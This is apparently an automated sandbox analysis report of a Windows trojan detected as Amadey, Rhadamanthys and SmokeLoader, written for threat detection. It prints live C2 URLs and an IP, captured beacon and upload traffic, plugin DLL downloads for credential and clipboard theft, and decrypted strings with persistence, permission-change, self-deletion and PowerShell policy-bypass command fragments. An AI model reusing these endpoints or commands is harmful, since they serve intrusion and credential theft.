Windows Analysis Report
xwREqjHUEv.exe

Overview

General Information

Sample name: xwREqjHUEv.exe (renamed because the original name is a hash value)
Original sample name: 068c05b9f062da142d266a374866d3bb.exe
Analysis ID: 1423732
MD5: 068c05b9f062da142d266a374866d3bb
SHA1: 315726e1015e1e69cf9645bda713f463e93a8755
SHA256: cce988ce6f528e02009122396aa4149091dbee5fbe8bcaabffaaa88ae02b127a
Tags: 32 exe trojan

Detection

Amadey, RHADAMANTHYS, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected RHADAMANTHYS Stealer
Yara detected SmokeLoader
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (STR)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution: Sandworm
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://atillapro.com/vsdjcn3khS/Plugins/cred64.dll Avira URL Cloud: Label: malware
Source: https://atillapro.com/ Avira URL Cloud: Label: malware
Source: atillapro.com/vsdjcn3khS/index.php Avira URL Cloud: Label: malware
Source: http://atillapro.com/ Avira URL Cloud: Label: malware
Source: http://atillapro.com/vsdjcn3khS/index.php?scr=1 Avira URL Cloud: Label: malware
Source: http://atillapro.com/vsdjcn3khS/Plugins/clip64.dll Avira URL Cloud: Label: malware
Source: http://atillapro.com/vsdjcn3khS/index.php Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\gfiecjd Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\F557.exe Avira: detection malicious, Label: TR/AD.Nekark.nsorh
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\F324.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Avira: detection malicious, Label: TR/AD.Nekark.nsorh
Source: 00000016.00000002.2788977995.00000000001F0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://atillapro.com/", "https://atillapro.com/"]}
Source: 31.0.Utsysc.exe.5f0000.0.unpack Malware Configuration Extractor: Amadey {"C2 url": "atillapro.com/vsdjcn3khS/index.php", "Version": "4.12"}
Source: atillapro.com Virustotal: Detection: 16%
Source: atillapro.com/vsdjcn3khS/index.php Virustotal: Detection: 15%
Source: http://atillapro.com/vsdjcn3khS/index.php?scr=1 Virustotal: Detection: 12%
Source: http://atillapro.com/vsdjcn3khS/Plugins/cred64.dll Virustotal: Detection: 19%
Source: http://atillapro.com/vsdjcn3khS/index.php Virustotal: Detection: 15%
Source: https://atillapro.com/ Virustotal: Detection: 15%
Source: http://atillapro.com/ Virustotal: Detection: 16%
Source: http://atillapro.com/vsdjcn3khS/Plugins/clip64.dll Virustotal: Detection: 19%
Source: C:\Users\user\AppData\Local\Temp\F324.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\F324.exe Virustotal: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\F557.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\F557.exe Virustotal: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Virustotal: Detection: 81%
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Virustotal: Detection: 69%
Source: C:\Users\user\AppData\Roaming\gfiecjd ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Roaming\gfiecjd Virustotal: Detection: 69%
Source: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP2810.tmp (copy) ReversingLabs: Detection: 75%
Source: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP2810.tmp (copy) Virustotal: Detection: 69%
Source: xwREqjHUEv.exe Virustotal: Detection: 23%
Source: C:\Users\user\AppData\Roaming\gfiecjd Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F557.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Joe Sandbox ML: detected
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: atillapro.com
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: /vsdjcn3khS/index.php
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: S-%lu-
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: bb8ef99577
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Utsysc.exe
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: SCHTASKS
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: /Create /SC MINUTE /MO 1 /TN
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: /TR "
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Startup
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: cmd /C RMDIR /s/q
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: rundll32
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: /Delete /TN "
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Programs
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: %USERPROFILE%
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: cred.dll|clip.dll|
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: http://
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: https://
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: /Plugins/
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: &unit=
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: shell32.dll
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: kernel32.dll
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: GetNativeSystemInfo
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: ProgramData\
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: AVAST Software
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Kaspersky Lab
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Panda Security
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Doctor Web
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: 360TotalSecurity
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Bitdefender
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Norton
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Sophos
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Comodo
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: WinDefender
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: 0123456789
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: ------
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: ?scr=1
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: ComputerName
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: -unicode-
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: VideoID
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: DefaultSettings.XResolution
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: DefaultSettings.YResolution
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: ProductName
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: CurrentBuild
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: echo Y|CACLS "
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: " /P "
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: CACLS "
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: :R" /E
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: :F" /E
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: &&Exit
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: rundll32.exe
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: "taskkill /f /im "
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: " && timeout 1 && del
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: && Exit"
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: " && ren
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: Powershell.exe
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: -executionpolicy remotesigned -File "
Source: 31.0.Utsysc.exe.5f0000.0.unpack String decryptor: shutdown -s -t 0
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BFFF7C CryptUnprotectData, 13_3_00007DF488BFFF7C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A3098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW, 25_2_030A3098
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A3717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW, 25_2_030A3717
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A3E04 RtlCompareMemory,CryptUnprotectData, 25_2_030A3E04
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA, 25_2_030A123B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A1198 CryptBinaryToStringA,CryptBinaryToStringA, 25_2_030A1198
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A11E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW, 25_2_030A11E1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A1FCE CryptUnprotectData,RtlMoveMemory, 25_2_030A1FCE
Source: xwREqjHUEv.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: xwREqjHUEv.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wkernel32.pdb source: dialer.exe, 00000008.00000003.2107474129.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: dialer.exe, 00000008.00000003.2106681750.0000000005680000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000008.00000003.2106830579.0000000005870000.00000004.00000001.00020000.00000000.sdmp, F324.exe, 00000017.00000003.2780142315.0000000003B00000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: dialer.exe, 00000008.00000003.2107068189.0000000005680000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000008.00000003.2107215768.0000000005820000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: dialer.exe, 00000008.00000003.2106681750.0000000005680000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000008.00000003.2106830579.0000000005870000.00000004.00000001.00020000.00000000.sdmp, F324.exe, 00000017.00000003.2780142315.0000000003B00000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: dialer.exe, 00000008.00000003.2107068189.0000000005680000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000008.00000003.2107215768.0000000005820000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: dialer.exe, 00000008.00000003.2107474129.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C63
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_00402910 FindFirstFileW, 0_2_00402910
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_004068B4 FindFirstFileW,FindClose, 0_2_004068B4
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005A14DE FindFirstFileExW, 24_2_005A14DE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose, 25_2_030A2B15
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose, 25_2_030A3ED9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose, 25_2_030A1D4A
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C08E20 GetLogicalDriveStringsW, 13_3_00007DF488C08E20
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local

Software Vulnerabilities

Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\OpenWith.exe Code function: 4x nop then dec esp 13_3_00007DF488C0BFA1
Source: C:\Windows\System32\OpenWith.exe Code function: 4x nop then dec esp 13_2_0000024AB87F0511
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 4x nop then dec esp 14_2_000001FF71025641
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 4x nop then ret 14_2_000001FF7102108E

Networking

Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 185.196.8.137 80
Source: Malware configuration extractor URLs: http://atillapro.com/
Source: Malware configuration extractor URLs: https://atillapro.com/
Source: Malware configuration extractor URLs: atillapro.com/vsdjcn3khS/index.php
Source: global traffic HTTP traffic detected: GET /vsdjcn3khS/Plugins/cred64.dll HTTP/1.1 Host: atillapro.com
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: atillapro.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODUwOTg= Host: atillapro.com Content-Length: 85250 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: atillapro.com Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: GET /vsdjcn3khS/Plugins/clip64.dll HTTP/1.1 Host: atillapro.com
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
